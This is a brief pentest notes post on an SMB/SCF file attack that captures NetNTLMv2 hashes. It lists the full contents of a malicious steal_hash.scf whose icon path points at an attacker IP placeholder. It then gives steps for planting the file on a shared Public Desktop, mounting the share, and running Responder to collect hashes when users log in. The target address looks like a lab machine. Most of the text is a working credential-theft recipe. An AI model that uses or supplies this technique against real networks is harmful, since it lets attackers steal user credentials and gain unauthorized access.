SMB - SCF File Attacks (NetNTLMv2 hash grab)

SMB - SCF (Shell Command Files) -  File Attacks (NetNTLMv2 hash(challenge) grab)




[Shell]
Command=2
IconFile=\\X.X.X.X\share\pentestlab.ico
[Taskbar]
Command=ToggleDesktop


Create a file steal_hash.scf with the above in it. Add the correct Attackers IP address



Next upload the file into the Desktop within the Public Folders.
The Public/Desktop folder is accessed every time any users logs in.
Therefore when the user logs in, the icon is requested from our attackers box,
a challenge request is requested by the attacker, a challenger response is then
returned to use with the NetNTLMv2.


Upload the file like so...

mount -t cifs '//10.10.10.103/Department shares' -o username=amanda /mnt



If we have a readable and mountable SMB share with Public, then we can add this by
combining the two attacks together.


 



Next start Responder - only very basic settings needed.


responder -I tun0


And now wait for a user to log in and we should see the NetNTLMv2 :-)

1 comment: